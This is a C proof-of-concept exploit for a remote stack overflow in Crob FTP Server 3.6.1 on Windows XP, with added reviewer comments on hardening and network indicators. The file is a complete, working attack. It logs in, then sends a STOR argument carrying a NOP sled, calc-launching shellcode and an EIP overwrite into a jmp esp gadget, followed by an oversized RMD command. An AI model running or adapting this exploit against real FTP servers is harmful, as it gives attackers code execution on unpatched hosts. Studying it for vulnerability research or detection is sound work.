/*
* CrobFTP remote stack overflow PoC
* ---------------------------------
* Tested on Crob FTP Server 3.6.1, Windows XP
*
* Coded by Leon Juranic <[email protected]>
* LSS Security / http://security.lss.hr
*
*/
#include <stdio.h>
#include <windows.h>
#include <time.h>
#pragma comment (lib,"ws2_32")
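/*
 * Wait up to five seconds for data on `sock` and return it as a C string.
 *
 * Returns a pointer to a static buffer holding the received text with any
 * trailing CR/LF removed, or NULL on timeout, select() failure, recv()
 * failure or orderly close by the peer. The buffer is overwritten by the
 * next call, so the function is neither reentrant nor thread-safe.
 */
char *fzz_recv (int sock)
{
    static char buf[10000];
    fd_set fds;
    struct timeval tv;
    int n;

    tv.tv_sec = 5;
    tv.tv_usec = 0;
    FD_ZERO(&fds);
    FD_SET(sock, &fds);

    /*
     * select() returns 0 on timeout and a negative value on error; in both
     * cases there is nothing to read. The original treated an error as
     * "readable" and then used an uninitialised length.
     */
    if (select(0, &fds, NULL, NULL, &tv) <= 0 || !FD_ISSET(sock, &fds))
        return NULL;

    /* Leave room for the terminator so a full-size read cannot overrun buf. */
    n = recv(sock, buf, (int)(sizeof(buf) - 1), 0);
    if (n <= 0)
        return NULL; /* error or closed connection: buf[n-1] would be out of bounds */

    buf[n] = '\0';
    /* Strip the line ending instead of blindly dropping the last byte. */
    while (n > 0 && (buf[n - 1] == '\r' || buf[n - 1] == '\n'))
        buf[--n] = '\0';

    printf ("RECV: %s\n", buf);
    return buf;
}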
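/*
 * Perform the FTP USER/PASS exchange on an already-connected socket.
 *
 * sock - connected socket to the FTP control port.
 * user - account name, sent as "USER <user>\r\n".
 * pass - password, sent as "PASS <pass>\r\n" (FTP sends it in clear text).
 *
 * Returns 0 when the reply to PASS begins with the "230" reply code and -1
 * otherwise (missing reply, different reply code, NULL or oversized
 * credentials). The original compared the whole reply with strcmp(), which
 * never matches a real "230 ..." line, so a rejected login was reported as
 * success.
 */
int login (int sock, char *user, char *pass)
{
    char buf[1024], *bla;

    if (user == NULL || pass == NULL)
        return -1;

    /*
     * Both strings come straight from the command line; refuse anything that
     * would not fit in buf together with the verb, CRLF and terminator.
     */
    if (strlen(user) > sizeof(buf) - sizeof("USER \r\n") ||
        strlen(pass) > sizeof(buf) - sizeof("PASS \r\n"))
        return -1;

    /* Server greeting; fzz_recv() returns NULL on timeout, so guard %s. */
    bla = fzz_recv(sock);
    printf ("recv: %s\n", bla ? bla : "(null)");

    sprintf (buf, "USER %s\r\n", user);
    send (sock, buf, (int)strlen(buf), 0);
    bla = fzz_recv(sock);
    printf ("recv: %s\n", bla ? bla : "(null)");

    sprintf (buf, "PASS %s\r\n", pass);
    send (sock, buf, (int)strlen(buf), 0);
    bla = fzz_recv(sock);
    printf ("recv: %s\n", bla ? bla : "(null)");

    if (bla == NULL)
        return -1;

    /* Only the three-digit reply code identifies a successful login. */
    return strncmp(bla, "230", 3) == 0 ? 0 : -1;
}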
/*
 * Proof-of-concept driver for the stack overflow named in the file header
 * (Crob FTP Server 3.6.1 on Windows XP).
 *
 * pack - target address as a dotted-quad string (passed to inet_addr()).
 * user - FTP user name forwarded to login().
 * pass - FTP password forwarded to login().
 *
 * Sequence visible below: start Winsock, connect to TCP port 21, log in,
 * send one STOR command whose argument is a 180-byte binary buffer, then
 * send one RMD command whose argument is ".../" repeated 276 times
 * (1380 bytes). Nothing is returned; setup failures terminate the process.
 *
 * Reviewer notes (defensive reading):
 *  - The PoC authenticates before sending either command; whether the flaw
 *    is reachable without a valid login is not shown here.
 *  - Per the author's inline comments the payload only runs calc.exe through
 *    system(), and it relies on hard-coded absolute addresses for the tested
 *    XP build, so it presumably depends on fixed library load addresses and
 *    an executable stack; address randomisation, DEP and stack cookies are
 *    the relevant hardening, alongside upgrading or retiring the server.
 *  - On the wire the indicators are an RMD argument made only of repeated
 *    ".../" and a STOR argument containing runs of 0x90 and other
 *    non-printable bytes; a length/charset limit on FTP command arguments
 *    or an IDS rule on either pattern would flag this traffic.
 */
void lame_sploit (char *pack, char *user, char *pass)
{
WORD wVersionRequested;
WSADATA wsaData;
int sock, err,x;
struct sockaddr_in sin;
char buf[2000],tmp[1000];
// Demonstration payload; the per-line annotations below are the author's.
char *shell= // 5 min. XP SP1 shellcode
"\x33\xc0" // xor eax,eax
"\x50" // push eax (\0)
"\x68\x2e\x65\x78\x65" // push '.exe'
"\x68\x63\x61\x6c\x63" // push 'calc'
"\x54" // push esp
"\xba\x44\x80\xc2\x77" // mov edx, 77c28044
"\xff\xd2"; // call edx (system)
// Winsock 2.2 must be initialised before any socket call.
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 ) {
printf ("ERROR: Sorry, cannot create socket!!!\n");
ExitProcess(-1);
}
// NOTE(review): the socket() result is not checked, and `sin` is not
// zeroed, so its padding bytes are uninitialised when passed to connect().
sock=socket(AF_INET,SOCK_STREAM,0);
sin.sin_family=AF_INET;
sin.sin_addr.s_addr = inet_addr(pack);
sin.sin_port = htons(21);
if (connect(sock,(struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) {
printf ("CONNECT :(((\n");
ExitProcess(-1);
}
if (login(sock,user,pass) == -1)
{
printf ("ERROR: Cannot login to FTP server, sorry!!!\n");
exit(-1);
}
// Build the STOR argument: zero the buffer, fill the first 180 bytes with
// 0x90, then copy the payload to offset 80. Byte 180 stays zero, so the
// "%s" below emits exactly 180 bytes.
memset(tmp,0,sizeof(tmp));
memset (tmp,0x90,180);
memcpy (&tmp[80],shell,strlen(shell));
// NOTE(review): these stores go through a cast pointer at offsets that are
// not 4-byte aligned and assume a 4-byte `long`; memcpy() would be the
// portable form. The values are fixed for the system named in the header.
*(long*)&tmp[158] = 0x77da52b8; // EIP -> ret into 'jmp esp'
*(long*)&tmp[166] = 0x74ec8390; // sub esp,0x74
*(long*)&tmp[170] = 0x9090e4ff; // jmp esp
_snprintf (buf,sizeof(buf),"STOR %s\r\n", tmp);
// NOTE(review): strlen() returns size_t but is printed with %d.
printf ("DEBUG: %.30s %d\n",buf,strlen(buf));
send (sock,buf,strlen(buf),0);
printf ("%s\n",fzz_recv(sock));
// Second command: "RMD " + 276 * ".../" + CRLF = 1386 bytes, which fits
// in the 2000-byte buf.
strcpy(buf,"RMD ");
for (x=0;x<276;x++)
strcat (buf,".../");
strcat(buf,"\r\n");
printf ("Sending exploit strings\n");
send (sock,buf,strlen(buf),0);
// NOTE(review): fzz_recv() can return NULL (timeout), which is then passed
// to %s; the socket is never closed and WSACleanup() is never called.
printf ("recv: %s\n",fzz_recv(sock));
}
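/*
 * Entry point: prints the banner, requires three arguments
 * (<target_IP> <user> <pass>) and hands them to lame_sploit().
 *
 * Returns -1 when too few arguments are given, 0 otherwise. The return type
 * is spelled out because implicit int is not valid since C99.
 */
int main (int argc, char **argv)
{
    printf ("CrobFTP Stack overflow PoC \n"
            "Coded by Leon Juranic <[email protected]>\n"
            "LSS Security / http://security.lss.hr/\n");

    if (argc < 4) {
        printf ("\nusage: %s <target_IP> <user> <pass>\n", argv[0]);
        return -1;
    }

    lame_sploit(argv[1], argv[2], argv[3]);
    return 0;
}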
// sebug.net